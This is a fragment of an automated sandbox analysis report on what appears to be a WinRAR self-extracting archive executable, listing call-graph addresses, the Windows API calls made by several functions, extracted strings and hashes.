calls 23354->23704 23357 798413 __EH_prolog 23356->23357 23358 79844f 23357->23358 23387 798453 23357->23387 23733 7a77e7 93 API calls 23357->23733 23359 798478 23358->23359 23362 7984ff 23358->23362 23358->23387 23361 79849a 23359->23361 23359->23387 23734 797a2f 151 API calls 23359->23734 23361->23387 23735 7a77e7 93 API calls 23361->23735 23362->23387 23705 795d98 23362->23705 23366 79858c 23366->23387 23713 7980f8 23366->23713 23368 7986e9 23370 79a145 8 API calls 23368->23370 23371 79874d 23368->23371 23370->23371 23717 797c11 23371->23717 23373 79c57d 73 API calls 23377 7987a7 _memcmp 23373->23377 23374 7988d1 23375 7989a0 23374->23375 23382 79891f 23374->23382 23380 7989fb 23375->23380 23392 7989ab 23375->23392 23376 7988ca 23738 796d0d 67 API calls 23376->23738 23377->23373 23377->23374 23377->23376 23377->23387 23736 7980a6 75 API calls 23377->23736 23737 796d0d 67 API calls 23377->23737 23390 79898f 23380->23390 23741 797f88 89 API calls 23380->23741 23381 7989f9 23383 799437 72 API calls 23381->23383 23384 799dff 4 API calls 23382->23384 23382->23390 23383->23387 23388 798956 23384->23388 23385 799437 72 API calls 23385->23387 23387->23300 23388->23390 23739 799161 89 API calls 23388->23739 23389 798a64 23391 79971a GetFileType 23389->23391 23402 798acd 23389->23402 23435 798fb5 23389->23435 23390->23381 23390->23389 23394 798aa5 23391->23394 23392->23381 23740 797dc4 93 API calls pre_c_initialization 23392->23740 23393 79a6a9 8 API calls 23396 798b1c 23393->23396 23394->23402 23742 791f18 67 API calls 23394->23742 23398 79a6a9 8 API calls 23396->23398 23404 798b32 23398->23404 23400 798abb 23743 796f67 68 API calls 23400->23743 23402->23393 23403 798bd5 23405 798c1e 23403->23405 23406 798d22 23403->23406 23404->23403 23723 799869 23404->23723 23407 798c8e 23405->23407 23408 798c2e 23405->23408 23410 798d48 23406->23410 23411 798d34 23406->23411 23418 798c4e 23406->23418 23409 7980f8 CharUpperW 23407->23409 23414 798c72 23408->23414 23421 798c3c 
23408->23421 23415 798ca9 23409->23415 23413 7a1fa9 68 API calls 23410->23413 23416 7990d0 120 API calls 23411->23416 23417 798d61 23413->23417 23414->23418 23745 7977d4 101 API calls 23414->23745 23415->23418 23423 798cd9 23415->23423 23424 798cd2 23415->23424 23416->23418 23419 7a1c40 120 API calls 23417->23419 23427 798e6c 23418->23427 23748 791f18 67 API calls 23418->23748 23419->23418 23744 791f18 67 API calls 23421->23744 23747 79900e 85 API calls __EH_prolog 23423->23747 23746 797586 77 API calls pre_c_initialization 23424->23746 23428 798edb 23427->23428 23427->23435 23749 799b6a SetEndOfFile 23427->23749 23728 799a12 23428->23728 23432 798f35 23433 7994a3 68 API calls 23432->23433 23434 798f40 23433->23434 23434->23435 23436 79a0c3 4 API calls 23434->23436 23435->23385 23437 798f9f 23436->23437 23437->23435 23750 791f18 67 API calls 23437->23750 23440 791640 23439->23440 23766 79c4b6 79 API calls 23440->23766 23443->23299 23444->23295 23446 79c41d __EH_prolog 23445->23446 23447 7acdae new 8 API calls 23446->23447 23448 79c460 23447->23448 23449 7acdae new 8 API calls 23448->23449 23450 79c484 23449->23450 23450->23314 23453 7acdb3 new 23451->23453 23452 791400 23452->23317 23452->23318 23453->23452 23457 7b46ca 7 API calls 2 library calls 23453->23457 23458 7ad83a RaiseException CallUnexpected new 23453->23458 23459 7ad81d RaiseException Concurrency::cancel_current_task CallUnexpected 23453->23459 23457->23453 23460->23321 23466 791705 23461->23466 23463 791378 23463->23331 23464->23337 23465->23336 23467 79171b 23466->23467 23478 791773 __vswprintf_c_l 23466->23478 23468 791744 23467->23468 23479 796dd3 67 API calls __vswprintf_c_l 23467->23479 23470 79179a 23468->23470 23474 791760 new 23468->23474 23472 7b20de 22 API calls 23470->23472 23471 79173a 23480 796e0b 68 API calls 23471->23480 23475 7917a1 23472->23475 23474->23478 23481 796e0b 68 API calls 23474->23481 23475->23478 23482 796e0b 68 API calls 23475->23482 23478->23463 23479->23471 23480->23468 
23481->23478 23482->23478 23484 79ffe8 __vswprintf_c_l 23483->23484 23484->23341 23486 7918fb __EH_prolog 23485->23486 23487 791934 23486->23487 23489 791964 23486->23489 23493 79190f 23486->23493 23488 793a20 90 API calls 23487->23488 23488->23493 23494 793e69 23489->23494 23493->23344 23497 793e72 23494->23497 23495 793a20 90 API calls 23495->23497 23497->23495 23498 791980 23497->23498 23511 79f8f2 23497->23511 23498->23493 23499 791da1 23498->23499 23500 791dab __EH_prolog 23499->23500 23519 793aa3 23500->23519 23502 791dd4 23503 791705 69 API calls 23502->23503 23505 791e5b 23502->23505 23504 791deb 23503->23504 23549 79187c 69 API calls 23504->23549 23505->23493 23507 791e03 23508 791e0f 23507->23508 23550 7a06e9 MultiByteToWideChar 23507->23550 23551 79187c 69 API calls 23508->23551 23512 79f8f9 23511->23512 23513 79f914 23512->23513 23517 796dce RaiseException CallUnexpected 23512->23517 23515 79f925 SetThreadExecutionState 23513->23515 23518 796dce RaiseException CallUnexpected 23513->23518 23515->23497 23517->23513 23518->23515 23520 793aad __EH_prolog 23519->23520 23521 793adf 23520->23521 23522 793ac3 23520->23522 23523 793d1f 23521->23523 23527 793b0b 23521->23527 23588 796d0d 67 API calls 23522->23588 23607 796d0d 67 API calls 23523->23607 23526 793ace 23526->23502 23527->23526 23552 7a0be0 23527->23552 23529 793b43 23556 7a1fa9 23529->23556 23531 793b8c 23532 793c17 23531->23532 23548 793b83 23531->23548 23591 79c57d 23531->23591 23569 79a6a9 23532->23569 23533 793b88 23533->23531 23590 791fb8 69 API calls 23533->23590 23534 793b78 23589 796d0d 67 API calls 23534->23589 23535 793b5a 23535->23531 23535->23533 23535->23534 23537 793c2a 23542 793c9b 23537->23542 23543 793ca5 23537->23543 23573 7990d0 23542->23573 23597 7a1c40 23543->23597 23546 793ca3 23546->23548 23606 791f18 67 API calls 23546->23606 23584 7a0e21 23548->23584 23549->23507 23550->23508 23551->23505 23553 7a0bea __EH_prolog 23552->23553 23608 79fb02 23553->23608 23555 7a0cea 
23555->23529 23557 7a1fb8 23556->23557 23559 7a1fc2 23556->23559 23627 796e0b 68 API calls 23557->23627 23560 7a2002 23559->23560 23562 7a2007 new 23559->23562 23568 7a2060 ___scrt_get_show_window_mode 23559->23568 23629 7b00ca RaiseException 23560->23629 23563 7a2117 23562->23563 23565 7a203c 23562->23565 23562->23568 23630 7b00ca RaiseException 23563->23630 23628 7a1eca 68 API calls 3 library calls 23565->23628 23566 7a213a 23568->23535 23568->23568 23570 79a6b6 23569->23570 23572 79a6c0 23569->23572 23571 7acdae new 8 API calls 23570->23571 23571->23572 23572->23537 23574 7990da __EH_prolog 23573->23574 23631 797c6b 23574->23631 23577 79135c 69 API calls 23578 7990ec 23577->23578 23634 79c658 23578->23634 23580 799146 23580->23546 23582 79c658 115 API calls 23583 7990fe 23582->23583 23583->23580 23583->23582 23643 79c810 91 API calls __vswprintf_c_l 23583->23643 23585 7a0e43 23584->23585 23650 79fc30 23585->23650 23587 7a0e5c 23587->23526 23588->23526 23589->23548 23590->23531 23592 79c59e 23591->23592 23593 79c5b0 23591->23593 23666 796195 73 API calls 23592->23666 23667 796195 73 API calls 23593->23667 23596 79c5a8 23596->23532 23598 7a1c49 23597->23598 23599 7a1c72 23597->23599 23601 7a1c68 23598->23601 23603 7a1c5e 23598->23603 23604 7a1c66 23598->23604 23599->23604 23682 7a421d 120 API calls 2 library calls 23599->23682 23681 7a4f35 115 API calls 23601->23681 23668 7a5984 23603->23668 23604->23546 23606->23548 23607->23526 23624 7acdf0 23608->23624 23610 79fb0c EnterCriticalSection 23611 79fb30 23610->23611 23622 79fb4e 23610->23622 23614 7acdae new 8 API calls 23611->23614 23612 79fb95 LeaveCriticalSection 23616 79fba1 23612->23616 23613 79fb66 23615 7acdae new 8 API calls 23613->23615 23617 79fb3a 23614->23617 23618 79fb70 23615->23618 23616->23555 23617->23622 23625 79f930 71 API calls 23617->23625 23619 79fb8a LeaveCriticalSection 23618->23619 23626 79f930 71 API calls 23618->23626 23619->23616 23622->23612 23622->23613 23623 79fb88 23623->23619 
23624->23610 23625->23622 23626->23623 23627->23559 23628->23568 23629->23563 23630->23566 23632 79a8e0 GetVersionExW 23631->23632 23633 797c70 23632->23633 23633->23577 23637 79c66d __vswprintf_c_l 23634->23637 23635 79c7b7 23636 79c7df 23635->23636 23644 79c5f7 23635->23644 23639 79f8f2 2 API calls 23636->23639 23637->23635 23640 79c7ae 23637->23640 23648 79a791 85 API calls 23637->23648 23649 7a77e7 93 API calls 23637->23649 23639->23640 23640->23583 23643->23583 23645 79c651 23644->23645 23646 79c600 23644->23646 23645->23636 23646->23645 23647 7a0680 PeekMessageW GetMessageW TranslateMessage DispatchMessageW SendDlgItemMessageW 23646->23647 23647->23645 23648->23637 23649->23637 23651 79fc39 EnterCriticalSection 23650->23651 23652 79fca2 23650->23652 23653 79fc75 23651->23653 23654 79fc57 23651->23654 23652->23587 23655 79f9d1 77 API calls 23653->23655 23656 79fc98 LeaveCriticalSection 23653->23656 23654->23653 23659 79f9d1 23654->23659 23657 79fc8f 23655->23657 23656->23652 23657->23656 23660 79fdc9 72 API calls 23659->23660 23661 79f9f3 ReleaseSemaphore 23660->23661 23662 79fa31 DeleteCriticalSection CloseHandle CloseHandle 23661->23662 23663 79fa13 23661->23663 23662->23653 23664 79fac7 70 API calls 23663->23664 23665 79fa1d CloseHandle 23664->23665 23665->23662 23665->23663 23666->23596 23667->23596 23683 7a21e6 23668->23683 23670 79c658 115 API calls 23678 7a5995 ___BuildCatchObject __vswprintf_c_l 23670->23678 23671 7a5d67 23701 7a3ef1 92 API calls __vswprintf_c_l 23671->23701 23673 7a5d77 __vswprintf_c_l 23673->23604 23678->23670 23678->23671 23687 79fa67 23678->23687 23693 7a2b3a 115 API calls 23678->23693 23694 7a5db9 115 API calls 23678->23694 23695 79fdc9 23678->23695 23699 7a2593 92 API calls __vswprintf_c_l 23678->23699 23700 7a63f2 120 API calls __vswprintf_c_l 23678->23700 23681->23604 23682->23604 23685 7a21f0 __EH_prolog ___scrt_get_show_window_mode new 23683->23685 23684 7a22db 23684->23678 23685->23684 23686 796e0b 68 API calls 23685->23686 
23686->23685 23688 79fa78 23687->23688 23689 79fa73 23687->23689 23691 79fa91 23688->23691 23692 79fdc9 72 API calls 23688->23692 23690 79fbb1 77 API calls 23689->23690 23690->23688 23691->23678 23692->23691 23693->23678 23694->23678 23696 79fe0e 23695->23696 23697 79fde3 ResetEvent ReleaseSemaphore 23695->23697 23696->23678 23698 79fac7 70 API calls 23697->23698 23698->23696 23699->23678 23700->23678 23701->23673 23702->23354 23703->23354 23704->23352 23706 795da6 23705->23706 23751 795cc5 23706->23751 23708 795dd9 23710 795e1a 23708->23710 23711 795e11 23708->23711 23756 79a950 CharUpperW CompareStringW CompareStringW 23708->23756 23710->23711 23757 79f0e1 CompareStringW 23710->23757 23711->23366 23715 798116 23713->23715 23714 7981b7 CharUpperW 23716 7981ca 23714->23716 23715->23714 23716->23368 23718 797c20 23717->23718 23719 797c60 23718->23719 23763 796f49 67 API calls 23718->23763 23719->23377 23721 797c58 23764 796d0d 67 API calls 23721->23764 23724 799897 2 API calls 23723->23724 23725 79987d 23724->23725 23726 799888 23725->23726 23765 799b6a SetEndOfFile 23725->23765 23726->23403 23729 799a23 23728->23729 23730 799a32 23728->23730 23729->23730 23731 799a29 FlushFileBuffers 23729->23731 23732 799aab SetFileTime 23730->23732 23731->23730 23732->23432 23733->23358 23734->23361 23735->23387 23736->23377 23737->23377 23738->23374 23739->23390 23740->23381 23741->23390 23742->23400 23743->23402 23744->23418 23745->23418 23746->23418 23747->23418 23748->23427 23749->23428 23750->23435 23758 795bc2 23751->23758 23754 795ce6 23754->23708 23755 795bc2 3 API calls 23755->23754 23756->23708 23757->23711 23760 795bcc 23758->23760 23759 795cb4 23759->23754 23759->23755 23760->23759 23762 79a950 CharUpperW CompareStringW CompareStringW 23760->23762 23762->23760 23763->23721 23764->23719 23765->23726 23768 79a27d 23767->23768 23769 79a29b FindFirstFileW 23768->23769 23770 79a30d FindNextFileW 23768->23770 23771 79a2b4 23769->23771 23778 79a2f1 23769->23778 23772 79a318 
GetLastError 23770->23772 23773 79a32c 23770->23773 23774 79b275 2 API calls 23771->23774 23772->23773 23773->23778 23775 79a2cd 23774->23775 23776 79a2d1 FindFirstFileW 23775->23776 23777 79a2e6 GetLastError 23775->23777 23776->23777 23776->23778 23777->23778 23778->23307 23779->23173 23780->23180 23781->23180 23782->23182 23783->23190 23785 799ba2 67 API calls 23784->23785 23786 791ee9 23785->23786 23787 791eed 23786->23787 23788 7919b1 90 API calls 23786->23788 23787->23198 23787->23199 23789 791efa 23788->23789 23789->23787 23791 796d0d 67 API calls 23789->23791 23791->23787 23911 7b1b40 5 API calls 2 library calls 23878 7a9646 92 API calls 23858 7a0d3a 26 API calls std::bad_exception::bad_exception 23816 7bf830 DeleteCriticalSection 23912 7ad736 20 API calls 23860 7aa537 93 API calls _swprintf 23861 7b5536 8 API calls ___vcrt_uninitialize 22153 7b6428 22161 7b784c 22153->22161 22156 7b643c 22158 7b6444 22159 7b6451 22158->22159 22169 7b6454 11 API calls 22158->22169 22170 7b7735 22161->22170 22164 7b788b TlsAlloc 22165 7b787c 22164->22165 22166 7ad783 _ValidateLocalCookies 5 API calls 22165->22166 22167 7b6432 22166->22167 22167->22156 22168 7b63a3 20 API calls 2 library calls 22167->22168 22168->22158 22169->22156 22171 7b7765 22170->22171 22174 7b7761 22170->22174 22171->22164 22171->22165 22172 7b7785 22172->22171 22175 7b7791 GetProcAddress 22172->22175 22174->22171 22174->22172 22177 7b77d1 22174->22177 22176 7b77a1 __crt_fast_encode_pointer 22175->22176 22176->22171 22178 7b77f2 LoadLibraryExW 22177->22178 22179 7b77e7 22177->22179 22180 7b780f GetLastError 22178->22180 22183 7b7827 22178->22183 22179->22174 22181 7b781a LoadLibraryExW 22180->22181 22180->22183 22181->22183 22182 7b783e FreeLibrary 22182->22179 22183->22179 22183->22182 23862 7a9123 73 API calls 23821 7ab820 72 API calls 22185 7ac726 19 API calls ___delayLoadHelper2@8 23822 791019 29 API calls pre_c_initialization 22268 7ad611 22269 7ad61d ___scrt_is_nonwritable_in_current_image 
22268->22269 22294 7ad126 22269->22294 22271 7ad624 22273 7ad64d 22271->22273 22371 7ada75 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 22271->22371 22282 7ad68c ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 22273->22282 22305 7b572c 22273->22305 22277 7ad66c ___scrt_is_nonwritable_in_current_image 22278 7ad6ec 22313 7adb90 22278->22313 22282->22278 22372 7b4760 38 API calls 3 library calls 22282->22372 22289 7ad718 22291 7ad721 22289->22291 22373 7b4b67 28 API calls _abort 22289->22373 22374 7ad29d 13 API calls 2 library calls 22291->22374 22295 7ad12f 22294->22295 22375 7ad8cb IsProcessorFeaturePresent 22295->22375 22297 7ad13b 22376 7b0b66 22297->22376 22299 7ad140 22304 7ad144 22299->22304 22385 7b55b9 22299->22385 22301 7ad15b 22301->22271 22304->22271 22306 7b5743 22305->22306 22307 7ad783 _ValidateLocalCookies 5 API calls 22306->22307 22308 7ad666 22307->22308 22308->22277 22309 7b56d0 22308->22309 22310 7b56ff 22309->22310 22311 7ad783 _ValidateLocalCookies 5 API calls 22310->22311 22312 7b5728 22311->22312 22312->22282 22484 7adea0 22313->22484 22316 7ad6f2 22317 7b567d 22316->22317 22486 7b8558 22317->22486 22319 7ad6fb 22322 7ac131 22319->22322 22320 7b5686 22320->22319 22490 7b88e3 38 API calls 22320->22490 22611 79f353 22322->22611 22326 7ac150 22660 7a9036 22326->22660 22328 7ac159 22664 7a0722 GetCPInfo 22328->22664 22330 7ac163 ___scrt_get_show_window_mode 22331 7ac176 GetCommandLineW 22330->22331 22332 7ac203 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 22331->22332 22333 7ac185 22331->22333 22334 793f5b _swprintf 51 API calls 22332->22334 22667 7aa8d4 22333->22667 22336 7ac26c SetEnvironmentVariableW GetModuleHandleW LoadIconW 22334->22336 22680 7a9a76 LoadBitmapW 22336->22680 22339 7ac1fd 22674 7abe0a 22339->22674 22340 7ac193 OpenFileMappingW 22343 7ac1ac MapViewOfFile 22340->22343 22344 7ac1f3 CloseHandle 22340->22344 22346 7ac1ea 
UnmapViewOfFile 22343->22346 22347 7ac1bd __vswprintf_c_l 22343->22347 22344->22332 22346->22344 22348 7abe0a 2 API calls 22347->22348 22350 7ac1d9 22348->22350 22349 7ac2b3 22351 7ac2c5 DialogBoxParamW 22349->22351 22350->22346 22352 7ac2ff 22351->22352 22353 7ac318 22352->22353 22354 7ac311 Sleep 22352->22354 22356 7ac326 22353->22356 22705 7a9237 CompareStringW SetCurrentDirectoryW ___scrt_get_show_window_mode 22353->22705 22354->22353 22357 7ac345 DeleteObject 22356->22357 22358 7ac35f 22357->22358 22359 7ac35c DeleteObject 22357->22359 22360 7ac3a2 22358->22360 22361 7ac390 22358->22361 22359->22358 22703 7a909e 22360->22703 22706 7abe69 WaitForSingleObject PeekMessageW WaitForSingleObject 22361->22706 22363 7ac396 CloseHandle 22363->22360 22365 7ac3dc 22366 7b4a9b GetModuleHandleW 22365->22366 22367 7ad70e 22366->22367 22367->22289 22368 7b4bc4 22367->22368 22860 7b4941 22368->22860 22371->22271 22372->22278 22373->22291 22374->22277 22375->22297 22377 7b0b6b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 22376->22377 22389 7b1c0e 22377->22389 22380 7b0b79 22380->22299 22382 7b0b81 22383 7b0b8c 22382->22383 22403 7b1c4a DeleteCriticalSection 22382->22403 22383->22299 22431 7b8ac5 22385->22431 22388 7b0b8f 8 API calls 3 library calls 22388->22304 22390 7b1c17 22389->22390 22392 7b1c40 22390->22392 22394 7b0b75 22390->22394 22404 7b1e85 22390->22404 22409 7b1c4a DeleteCriticalSection 22392->22409 22394->22380 22395 7b0ca6 22394->22395 22424 7b1d9a 22395->22424 22397 7b0cb0 22402 7b0cbb 22397->22402 22429 7b1e48 6 API calls try_get_function 22397->22429 22399 7b0cc9 22400 7b0cd6 22399->22400 22430 7b0cd9 6 API calls ___vcrt_FlsFree 22399->22430 22400->22382 22402->22382 22403->22380 22410 7b1c79 22404->22410 22407 7b1ebc InitializeCriticalSectionAndSpinCount 22408 7b1ea8 22407->22408 22408->22390 22409->22394 22411 7b1ca9 22410->22411 22412 7b1cad 22410->22412 22411->22412 22416 7b1ccd 22411->22416 22417 7b1d19 22411->22417 

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0079F353: GetModuleHandleW.KERNEL32 ref: 0079F36B
                                                                                                                                          • Part of subcall function 0079F353: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0079F383
                                                                                                                                          • Part of subcall function 0079F353: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0079F3A6
                                                                                                                                          • Part of subcall function 007A8B8E: GetCurrentDirectoryW.KERNEL32(?,?), ref: 007A8B96
                                                                                                                                          • Part of subcall function 007A9036: OleInitialize.OLE32(00000000), ref: 007A904F
                                                                                                                                          • Part of subcall function 007A9036: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 007A9086
                                                                                                                                          • Part of subcall function 007A9036: SHGetMalloc.SHELL32(007D20E8), ref: 007A9090
                                                                                                                                          • Part of subcall function 007A0722: GetCPInfo.KERNEL32(00000000,?), ref: 007A0733
                                                                                                                                          • Part of subcall function 007A0722: IsDBCSLeadByte.KERNEL32(00000000), ref: 007A0747
                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 007AC179
                                                                                                                                        • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 007AC1A0
                                                                                                                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 007AC1B1
                                                                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 007AC1EB
                                                                                                                                          • Part of subcall function 007ABE0A: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 007ABE20
                                                                                                                                          • Part of subcall function 007ABE0A: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 007ABE5C
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 007AC1F4
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,007E7938,00000800), ref: 007AC20F
                                                                                                                                        • SetEnvironmentVariableW.KERNEL32(sfxname,007E7938), ref: 007AC221
                                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 007AC228
                                                                                                                                        • _swprintf.LIBCMT ref: 007AC267
                                                                                                                                        • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 007AC279
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 007AC27C
                                                                                                                                        • LoadIconW.USER32(00000000,00000064), ref: 007AC293
                                                                                                                                        • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00019B4F,00000000), ref: 007AC2E4
                                                                                                                                        • Sleep.KERNEL32(?), ref: 007AC312
                                                                                                                                        • DeleteObject.GDI32 ref: 007AC351
                                                                                                                                        • DeleteObject.GDI32(?), ref: 007AC35D
                                                                                                                                          • Part of subcall function 007AA8D4: CharUpperW.USER32(?,?,?,?,00001000), ref: 007AA92C
                                                                                                                                          • Part of subcall function 007AA8D4: CharUpperW.USER32(?,?,?,?,?,00001000), ref: 007AA953
                                                                                                                                        • CloseHandle.KERNEL32 ref: 007AC39C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EnvironmentFileHandleVariable$Module$AddressCharCloseDeleteObjectProcUpperView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$*a}$*x~$8y~$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                                        • API String ID: 985665271-1214139122
                                                                                                                                        • Opcode ID: 9b3b3af242c646f9c5e43a51489d1300185ce981aad43113e27ad15ecebe0fa4
                                                                                                                                        • Instruction ID: 1cb247041f0b7d86d2900efd8673b1a3b938adac1ee824c9627bc019c86160b4
                                                                                                                                        • Opcode Fuzzy Hash: 9b3b3af242c646f9c5e43a51489d1300185ce981aad43113e27ad15ecebe0fa4
                                                                                                                                        • Instruction Fuzzy Hash: 446127B1905344FFD721ABA5EC49F2B37ACAB8A700F04852EF54492192DB7C9D40C7E6

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • FindResourceW.KERNELBASE(00000066,PNG,?,?,007A9AC8,00000066), ref: 007A8BE1
                                                                                                                                        • SizeofResource.KERNEL32(00000000,75295780,?,?,007A9AC8,00000066), ref: 007A8BF9
                                                                                                                                        • LoadResource.KERNEL32(00000000,?,?,007A9AC8,00000066), ref: 007A8C0C
                                                                                                                                        • LockResource.KERNEL32(00000000,?,?,007A9AC8,00000066), ref: 007A8C17
                                                                                                                                        • GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,007A9AC8,00000066), ref: 007A8C35
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 007A8C42
                                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 007A8C62
                                                                                                                                        • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 007A8C9D
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 007A8CB2
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 007A8CB9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                                                                                                                                        • String ID: PNG
                                                                                                                                        • API String ID: 3656887471-364855578
                                                                                                                                        • Opcode ID: 65a200df37ca53cf6bbc7e7dcfe337e55df71a71ff4a4b5f8f246bd9b28bc3a2
                                                                                                                                        • Instruction ID: fba835cd74a5a272aac2b41a3796543ce454f8e59618dc6505c399bf3a6ccc26
                                                                                                                                        • Opcode Fuzzy Hash: 65a200df37ca53cf6bbc7e7dcfe337e55df71a71ff4a4b5f8f246bd9b28bc3a2
                                                                                                                                        • Instruction Fuzzy Hash: 6C216FB1602605EFC7619F61DD49D2BBBA8EF867A1B04466CF845C6260DB39DC008AF2

                                                                                                                                        Control-flow Graph

                                                                                                                                        control_flow_graph 860 79a273-79a299 call 7acec0 863 79a29b-79a2ae FindFirstFileW 860->863 864 79a30d-79a316 FindNextFileW 860->864 865 79a334-79a3dd call 79f10e call 79b902 call 7a01c1 * 3 863->865 866 79a2b4-79a2cf call 79b275 863->866 867 79a318-79a326 GetLastError 864->867 868 79a32c-79a32e 864->868 870 79a3e2-79a3f5 865->870 875 79a2d1-79a2e4 FindFirstFileW 866->875 876 79a2e6-79a2ef GetLastError 866->876 867->868 868->865 868->870 875->865 875->876 878 79a2f1-79a2f4 876->878 879 79a300 876->879 878->879 881 79a2f6-79a2f9 878->881 882 79a302-79a308 879->882 881->879 884 79a2fb-79a2fe 881->884 882->870 884->882
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0079A16E,000000FF,?,?), ref: 0079A2A8
                                                                                                                                        • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0079A16E,000000FF,?,?), ref: 0079A2DE
                                                                                                                                        • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0079A16E,000000FF,?,?), ref: 0079A2E6
                                                                                                                                        • FindNextFileW.KERNEL32(?,?,?,?,?,?,0079A16E,000000FF,?,?), ref: 0079A30E
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,0079A16E,000000FF,?,?), ref: 0079A31A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileFind$ErrorFirstLast$Next
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 869497890-0
                                                                                                                                        • Opcode ID: 6523dcb740fc3b542d82aa016829ff9b9daa3fa251624bd8c30c36aeb817de2f
                                                                                                                                        • Instruction ID: 28b2cbdc365079208274768e80bda0119a33c58ccadb50c77be32ea74c37e9fb
                                                                                                                                        • Opcode Fuzzy Hash: 6523dcb740fc3b542d82aa016829ff9b9daa3fa251624bd8c30c36aeb817de2f
                                                                                                                                        • Instruction Fuzzy Hash: DF415E72609245EFC724EF64D884ADAF7E8BB89350F104A2AF599D3240D738A9548BD2
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,007B4A30,?,007C7F68,0000000C,007B4B87,?,00000002,00000000), ref: 007B4A7B
                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,007B4A30,?,007C7F68,0000000C,007B4B87,?,00000002,00000000), ref: 007B4A82
                                                                                                                                        • ExitProcess.KERNEL32 ref: 007B4A94
                                                                                                                                        Memory Dump Source
